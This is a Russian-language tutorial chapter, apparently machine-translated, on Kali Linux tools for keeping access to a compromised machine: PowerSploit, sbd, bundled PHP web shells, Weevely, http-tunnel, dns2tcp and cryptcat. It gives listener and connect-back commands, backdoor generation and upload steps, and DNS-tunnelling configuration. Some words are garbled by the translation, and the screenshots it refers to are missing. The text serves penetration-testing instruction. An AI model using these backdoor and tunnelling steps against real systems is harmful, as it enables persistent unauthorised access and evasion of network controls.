Kali Linux - Поддержание доступа
В этой главе мы увидим инструменты, которые Kali использует для поддержания соединения и для доступа к взломанной машине, даже когда она снова подключается и отключается.
Powersploit
Это инструмент, предназначенный для компьютеров с Windows. На компьютере жертвы установлен PowerShell. Этот инструмент помогает хакеру подключиться к машине жертвы через PowerShell.
Чтобы открыть его, откройте терминал слева и введите следующую команду, чтобы войти в папку powersploit -
cd /usr/share/powersploit/
Если вы напечатаете “ls”в нем будут перечислены все инструменты powersploit, которые вы можете загрузить и установить на машине жертвы после получения доступа. Большинство из них самоочевидны в соответствии с их именами.
Простой способ загрузить этот инструмент на машину жертвы - создать веб-сервер, который инструменты powersploit позволяют легко создавать с помощью следующей команды:
python -m SimpleHTTPServer
После этого, если вы наберете: http: // <ip_address машины Kali>: 8000 / следующий результат.
Сбд
sbd - это инструмент, похожий на Netcat. Он портативен и может использоваться на машинах Linux и Microsoft. sbd имеет шифрование AES-CBC-128 + HMAC-SHA1> По сути, он помогает подключаться к машине жертвы в любое время через определенный порт и отправлять команды удаленно.
Чтобы открыть его, зайдите в терминал и введите “sbd -l -p port” чтобы сервер принимал соединения.
В этом случае давайте поместим порт 44, на котором сервер будет слушать.
На сайте жертвы введите “sbd IPofserver port”. Будет установлено соединение, по которому мы сможем отправлять удаленные команды.
В данном случае это «localhost», поскольку мы проводили тест на той же машине.
Наконец, на сервере вы увидите, что соединение произошло, как показано на следующем снимке экрана.
Веб-оболочки
Веб-оболочки можно использовать для поддержания доступа или взлома веб-сайта. Но большинство из них обнаруживаются антивирусами. Оболочка C99 php очень хорошо известна среди антивирусов. Любой распространенный антивирус легко распознает его как вредоносное ПО.
Как правило, их основная функция - отправлять системные команды через веб-интерфейсы.
Чтобы открыть его, введите “cd /usr/share/webshells/” в терминале.
Как видите, они разделены на классы по языку программирования: asp, aspx, cfm, jsp, perl, php.
Если вы войдете в папку PHP, вы увидите все веб-оболочки для веб-страниц php.
Чтобы загрузить оболочку на веб-сервер, например “simple-backdoor.php” откройте веб-страницу и URL-адрес веб-оболочки.
В конце напишите команду cmd. У вас будет вся информация, показанная на следующем снимке экрана.
Weevely
Weevely - это веб-оболочка PHP, имитирующая соединение, подобное telnet. Это инструмент для пост-эксплуатации веб-приложений, который можно использовать как скрытый бэкдор или как веб-оболочку для управления законными веб-учетными записями, даже бесплатными размещенными.
Чтобы открыть его, перейдите в терминал и введите «weevely», чтобы увидеть его использование.
Чтобы сгенерировать оболочку, введите “weevely generate password pathoffile”. Как видно на следующем снимке экрана, он создается в папке «Рабочий стол», и файл должен быть загружен на веб-сервер для получения доступа.
После загрузки веб-оболочки, как показано на следующем снимке экрана, мы можем подключиться с помощью cmd к серверу с помощью команды “weevely URL password” где видно, что сеанс начался.
http-туннель
http-tunnel создает двунаправленный виртуальный поток данных, туннелируемый в HTTP-запросах. При желании запросы могут быть отправлены через HTTP-прокси. Это может быть полезно для пользователей за ограничительными брандмауэрами. Если доступ к WWW разрешен через прокси-сервер HTTP, можно использовать http-туннель и telnet или PPP для подключения к компьютеру за пределами брандмауэра.
Во-первых, мы должны создать туннельный сервер с помощью следующей команды -
httptunnel_server –h
Затем на клиентском сайте введите “httptunnel_client –h” и оба начнут принимать соединения.
dns2tcp
Это снова инструмент туннелирования, который помогает пропускать TCP-трафик через DNS-трафик, что означает порт UDP 53.
Чтобы запустить его, введите “dns2tcpd”. Использование объясняется, когда вы откроете сценарий.
На сайте сервера введите эту команду, чтобы настроить файл.
#cat >>.dns2tcpdrc
<&l;END listen = 0.0.0.0
port = 53 user=nobody
chroot = /root/dns2tcp
pid_file = /var/run/dns2tcp.pid
domain = your domain key = secretkey
resources = ssh:127.0.0.1:22
END
#dns2tcpd -f .dns2tcpdrc
На сайте клиента введите эту команду.
# cat >>.dns2tcprc
<<END domain = your domain
resource = ssh
local_port = 7891
key = secretkey
END
# dns2tcpc -f .dns2tcprc
# ssh root@localhost -p 7891 -D 7076
Туннелирование начнется с этой команды.
шифровальщик
Это еще один инструмент, такой как Netcat, который позволяет устанавливать TCP и UDP-соединение с машиной жертвы в зашифрованном виде.
Чтобы запустить сервер для прослушивания соединения, введите следующую команду -
cryptcat –l –p port –n
Где,
-l означает прослушивание соединения
-p обозначает параметр номера порта
-n означает невыполнение разрешения имен
На клиентском сайте команда подключения “cryptcat IPofServer PortofServer”